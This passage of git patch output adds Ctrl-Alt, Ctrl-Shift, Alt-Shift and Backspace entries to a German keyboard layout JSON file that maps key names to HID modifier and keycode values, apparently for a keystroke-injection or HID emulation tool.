"ALT-TAB":"00,00,71", + "CONTROL":"01,00,00", + "CTRL":"01,00,00", + "SHIFT":"02,00,00", + "A":"02,00,04", + "B":"02,00,05", + "C":"02,00,06", + "D":"02,00,07", + "E":"02,00,08", + "F":"02,00,09", + "G":"02,00,0a", + "H":"02,00,0b", + "I":"02,00,0c", + "J":"02,00,0d", + "K":"02,00,0e", + "L":"02,00,0f", + "M":"02,00,10", + "N":"02,00,11", + "O":"02,00,12", + "P":"02,00,13", + "Q":"02,00,14", + "R":"02,00,15", + "S":"02,00,16", + "T":"02,00,17", + "U":"02,00,18", + "V":"02,00,19", + "W":"02,00,1a", + "X":"02,00,1b", + "Z":"02,00,1c", + "Y":"02,00,1d", + "!":"02,00,1e", + "\"":"02,00,1f", + "$":"02,00,21", + "%":"02,00,22", + "&":"02,00,23", + "/":"02,00,24", + "(":"02,00,25", + ")":"02,00,26", + "=":"02,00,27", + "?":"02,00,2d", + "`":"02,00,2e", + "*":"02,00,30", + "'":"02,00,31", + ";":"02,00,36", + ":":"02,00,37", + "_":"02,00,38", + ">":"02,00,64", + "CTRL-SHIFT":"03,00,00", + "ALT":"04,00,00", + "ALTGR":"40,00,00", + "CTRL-ALT":"05,00,00", + "CTRL-ALT-DELETE": "05,00,4c", + "ALT-SHIFT":"06,00,00", + "COMMAND":"08,00,00", + "GUI":"08,00,00", + "WINDOWS":"08,00,00", + "COMMAND-OPTION":"12,00,00", + "@":"40,00,14", + "{":"40,00,24", + "[":"40,00,25", + "]":"40,00,26", + "}":"40,00,27", + "\\":"40,00,2d", + "~":"40,00,30", + "|":"40,00,64", + "COMMAND-CTRL-SHIFT":"40,00,64", + "COMMAND-CTRL":"40,00,64", + "COMMAND-OPTION-SHIFT'":"40,00,64", + "ß":"00,00,2d", + "€":"40,00,08", + "§":"02,00,20", + "ä":"00,00,34", + "ö":"00,00,33", + "ü":"00,00,2f", + "Ä":"02,00,34", + "Ö":"02,00,33", + "Ü":"02,00,2f", + "CTRL-a":"01,00,04", + "CTRL-b":"01,00,05", + "CTRL-c":"01,00,06", + "CTRL-d":"01,00,07", + "CTRL-e":"01,00,08", + "CTRL-f":"01,00,09", + "CTRL-g":"01,00,0a", + "CTRL-h":"01,00,0b", + "CTRL-i":"01,00,0c", + "CTRL-j":"01,00,0d", + "CTRL-k":"01,00,0e", + "CTRL-l":"01,00,0f", + "CTRL-m":"01,00,10", + "CTRL-n":"01,00,11", + "CTRL-o":"01,00,12", + "CTRL-p":"01,00,13", + "CTRL-q":"01,00,14", + "CTRL-r":"01,00,15", + "CTRL-s":"01,00,16", + "CTRL-t":"01,00,17", + "CTRL-u":"01,00,18", + "CTRL-v":"01,00,19", + "CTRL-w":"01,00,1a", + "CTRL-x":"01,00,1b", + "CTRL-y":"01,00,1d", + "CTRL-z":"01,00,1c", + "CTRL-1":"01,00,1e", + "CTRL-2":"01,00,1f", + "CTRL-3":"01,00,20", + "CTRL-4":"01,00,21", + "CTRL-5":"01,00,22", + "CTRL-6":"01,00,23", + "CTRL-7":"01,00,24", + "CTRL-8":"01,00,25", + "CTRL-9":"01,00,26", + "CTRL-0":"01,00,27" +} \ No newline at end of file From 7be443645fd889a52298805ba26d1a1e1aac2c88 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 20 May 2023 11:04:24 +0200 Subject: [PATCH 12/13] Added more keyboard shortcuts --- languages/de.json | 115 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 114 insertions(+), 1 deletion(-) diff --git a/languages/de.json b/languages/de.json index 796af87..98b5492 100644 --- a/languages/de.json +++ b/languages/de.json @@ -18,6 +18,7 @@ "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", "__comment":"German umlauts added by Simon Dankelmann", + "__comment":"CTRL-ALT+DEL, ARTGR and various shortcuts added by Mark B.", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", @@ -178,6 +179,7 @@ "Ä":"02,00,34", "Ö":"02,00,33", "Ü":"02,00,2f", + "CTRL-a":"01,00,04", "CTRL-b":"01,00,05", "CTRL-c":"01,00,06", @@ -213,5 +215,116 @@ "CTRL-7":"01,00,24", "CTRL-8":"01,00,25", "CTRL-9":"01,00,26", - "CTRL-0":"01,00,27" + "CTRL-0":"01,00,27", + + "CTRL-ALT-a":"05,00,04", + "CTRL-ALT-b":"05,00,05", + "CTRL-ALT-c":"05,00,06", + "CTRL-ALT-d":"05,00,07", + "CTRL-ALT-e":"05,00,08", + "CTRL-ALT-f":"05,00,09", + "CTRL-ALT-g":"05,00,0a", + "CTRL-ALT-h":"05,00,0b", + "CTRL-ALT-i":"05,00,0c", + "CTRL-ALT-j":"05,00,0d", + "CTRL-ALT-k":"05,00,0e", + "CTRL-ALT-l":"05,00,0f", + "CTRL-ALT-m":"05,00,10", + "CTRL-ALT-n":"05,00,11", + "CTRL-ALT-o":"05,00,12", + "CTRL-ALT-p":"05,00,13", + "CTRL-ALT-q":"05,00,14", + "CTRL-ALT-r":"05,00,15", + "CTRL-ALT-s":"05,00,16", + "CTRL-ALT-t":"05,00,17", + "CTRL-ALT-u":"05,00,18", + "CTRL-ALT-v":"05,00,19", + "CTRL-ALT-w":"05,00,1a", + "CTRL-ALT-x":"05,00,1b", + "CTRL-ALT-y":"05,00,1d", + "CTRL-ALT-z":"05,00,1c", + "CTRL-ALT-1":"05,00,1e", + "CTRL-ALT-2":"05,00,1f", + "CTRL-ALT-3":"05,00,20", + "CTRL-ALT-4":"05,00,21", + "CTRL-ALT-5":"05,00,22", + "CTRL-ALT-6":"05,00,23", + "CTRL-ALT-7":"05,00,24", + "CTRL-ALT-8":"05,00,25", + "CTRL-ALT-9":"05,00,26", + "CTRL-ALT-0":"05,00,27", + + "CTRL-SHIFT-a":"03,00,04", + "CTRL-SHIFT-b":"03,00,05", + "CTRL-SHIFT-c":"03,00,06", + "CTRL-SHIFT-d":"03,00,07", + "CTRL-SHIFT-e":"03,00,08", + "CTRL-SHIFT-f":"03,00,09", + "CTRL-SHIFT-g":"03,00,0a", + "CTRL-SHIFT-h":"03,00,0b", + "CTRL-SHIFT-i":"03,00,0c", + "CTRL-SHIFT-j":"03,00,0d", + "CTRL-SHIFT-k":"03,00,0e", + "CTRL-SHIFT-l":"03,00,0f", + "CTRL-SHIFT-m":"03,00,10", + "CTRL-SHIFT-n":"03,00,11", + "CTRL-SHIFT-o":"03,00,12", + "CTRL-SHIFT-p":"03,00,13", + "CTRL-SHIFT-q":"03,00,14", + "CTRL-SHIFT-r":"03,00,15", + "CTRL-SHIFT-s":"03,00,16", + "CTRL-SHIFT-t":"03,00,17", + "CTRL-SHIFT-u":"03,00,18", + "CTRL-SHIFT-v":"03,00,19", + "CTRL-SHIFT-w":"03,00,1a", + "CTRL-SHIFT-x":"03,00,1b", + "CTRL-SHIFT-y":"03,00,1d", + "CTRL-SHIFT-z":"03,00,1c", + "CTRL-SHIFT-1":"03,00,1e", + "CTRL-SHIFT-2":"03,00,1f", + "CTRL-SHIFT-3":"03,00,20", + "CTRL-SHIFT-4":"03,00,21", + "CTRL-SHIFT-5":"03,00,22", + "CTRL-SHIFT-6":"03,00,23", + "CTRL-SHIFT-7":"03,00,24", + "CTRL-SHIFT-8":"03,00,25", + "CTRL-SHIFT-9":"03,00,26", + "CTRL-SHIFT-0":"03,00,27", + + "ALT-SHIFT-a":"06,00,04", + "ALT-SHIFT-b":"06,00,05", + "ALT-SHIFT-c":"06,00,06", + "ALT-SHIFT-d":"06,00,07", + "ALT-SHIFT-e":"06,00,08", + "ALT-SHIFT-f":"06,00,09", + "ALT-SHIFT-g":"06,00,0a", + "ALT-SHIFT-h":"06,00,0b", + "ALT-SHIFT-i":"06,00,0c", + "ALT-SHIFT-j":"06,00,0d", + "ALT-SHIFT-k":"06,00,0e", + "ALT-SHIFT-l":"06,00,0f", + "ALT-SHIFT-m":"06,00,10", + "ALT-SHIFT-n":"06,00,11", + "ALT-SHIFT-o":"06,00,12", + "ALT-SHIFT-p":"06,00,13", + "ALT-SHIFT-q":"06,00,14", + "ALT-SHIFT-r":"06,00,15", + "ALT-SHIFT-s":"06,00,16", + "ALT-SHIFT-t":"06,00,17", + "ALT-SHIFT-u":"06,00,18", + "ALT-SHIFT-v":"06,00,19", + "ALT-SHIFT-w":"06,00,1a", + "ALT-SHIFT-x":"06,00,1b", + "ALT-SHIFT-y":"06,00,1d", + "ALT-SHIFT-z":"06,00,1c", + "ALT-SHIFT-1":"06,00,1e", + "ALT-SHIFT-2":"06,00,1f", + "ALT-SHIFT-3":"06,00,20", + "ALT-SHIFT-4":"06,00,21", + "ALT-SHIFT-5":"06,00,22", + "ALT-SHIFT-6":"06,00,23", + "ALT-SHIFT-7":"06,00,24", + "ALT-SHIFT-8":"06,00,25", + "ALT-SHIFT-9":"06,00,26", + "ALT-SHIFT-0":"06,00,27" } \ No newline at end of file From 2856f9ae03774552df2cd765d5b023b886e29a32 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 20 May 2023 11:16:47 +0200 Subject: [PATCH 13/13] Added BACKSPACE --- languages/de.json | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/languages/de.json b/languages/de.json index 98b5492..4e67077 100644 --- a/languages/de.json +++ b/languages/de.json @@ -18,7 +18,7 @@ "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", "__comment":"German umlauts added by Simon Dankelmann", - "__comment":"CTRL-ALT+DEL, ARTGR and various shortcuts added by Mark B.", + "__comment":"CTRL-ALT+DEL, ARTGR, BACKSPACE and various shortcuts added by Mark B.", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", @@ -159,6 +159,7 @@ "GUI":"08,00,00", "WINDOWS":"08,00,00", "COMMAND-OPTION":"12,00,00", + "BACKSPACE":"00,00,2a", "@":"40,00,14", "{":"40,00,24", "[":"40,00,25", @@ -179,7 +180,6 @@ "Ä":"02,00,34", "Ö":"02,00,33", "Ü":"02,00,2f", - "CTRL-a":"01,00,04", "CTRL-b":"01,00,05", "CTRL-c":"01,00,06", @@ -216,7 +216,6 @@ "CTRL-8":"01,00,25", "CTRL-9":"01,00,26", "CTRL-0":"01,00,27", - "CTRL-ALT-a":"05,00,04", "CTRL-ALT-b":"05,00,05", "CTRL-ALT-c":"05,00,06", @@ -253,7 +252,6 @@ "CTRL-ALT-8":"05,00,25", "CTRL-ALT-9":"05,00,26", "CTRL-ALT-0":"05,00,27", - "CTRL-SHIFT-a":"03,00,04", "CTRL-SHIFT-b":"03,00,05", "CTRL-SHIFT-c":"03,00,06", @@ -290,7 +288,6 @@ "CTRL-SHIFT-8":"03,00,25", "CTRL-SHIFT-9":"03,00,26", "CTRL-SHIFT-0":"03,00,27", - "ALT-SHIFT-a":"06,00,04", "ALT-SHIFT-b":"06,00,05", "ALT-SHIFT-c":"06,00,06",